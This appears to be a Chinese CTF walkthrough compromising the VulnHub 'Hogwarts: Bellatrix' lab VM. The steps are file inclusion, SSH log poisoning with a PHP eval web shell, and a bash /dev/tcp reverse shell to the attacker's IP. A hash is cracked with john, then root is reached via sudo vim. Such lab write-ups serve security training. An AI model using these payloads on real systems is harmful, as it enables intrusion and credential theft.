一、介绍

运行环境：Virtualbox

攻击机：kali（10.0.2.4）

靶机：Bellatrix（10.0.2.9）

目标：获取靶机root权限和flag

靶机下载地址：https://www.vulnhub.com/entry/hogwarts-bellatrix,609/

二、信息收集

使用nmap主机发现靶机ip：10.0.2.9

使用nmap端口扫描发现靶机开放端口：22、80

nmap -A 10.0.2.9 -p 1-65535

打开网站未发现什么功能点

查看源码发现隐藏信息，存在一个php文件有文件包含漏洞

提示说有文件包含漏洞的文件已经告诉我们了，我们查看网站首页有一个php文件名：ikilledsiriusblackikilledsiriusblackikilledsiriusblackikilledsiriusblack.php

但直接访问该文件发现显示该文件不存在，再次查看文件名发现它是由很多重复项ikilledsiriusblack构成，可以猜测文件名为ikilledsiriusblack.php，访问该文件回显成功，该文件存在

三、漏洞利用

我们可以访问http://10.0.2.9/ikilledsiriusblack.php?file=/etc/passwd，发现靶机存在三个用户root、lestrange、bellatrix

根据靶机开放了22端口，尝试包含ssh日志文件/var/log/auth.log

可以通过在用户名处注入一句话木马，往ssh日志文件写入一句话木马

ssh '<?php @eval($_POST["pass"]);?>'@10.0.2.9

然后使用蚁剑连接

反弹shell

bash -c 'bash -i >& /dev/tcp/10.0.2.4/4444 0>&1'

获取交互式shell

python3 -c 'import pty; pty.spawn("/bin/bash")'

四、提权

在/var/www/html目录下发现一个奇怪的文件夹，查看该文件夹，发现两个文件

其中.secret.dic文件包含一些字典字符串

Swordofgryffindor文件保存有lestrange用户的加密后的密码

lestrange:$6$1eIjsdebFF9/rsXH$NajEfDYUP7p/sqHdyOIFwNnltiRPwIU0L14a8zyQdRUlAomDNrnRjTPN5Y/WirDnwMn698kIA5CV8NLdyGiY0

我们可以尝试使用john工具对lestrange用户的密码进行暴力破解，字典选用.secret.dic文件里面提供的，得到密码：ihateharrypotter

john --wordlist=secret.dic  passwd.txt

切换为lestrange用户

使用sudo -l命令查看一下具有sudo权限的程序，发现可以无密码以root权限运行vim

搜索vim提权用法：vim | GTFOBins

sudo vim -c ':!/bin/sh'

获取flag

/home/bellatrix/flag.txt

/root/root.txt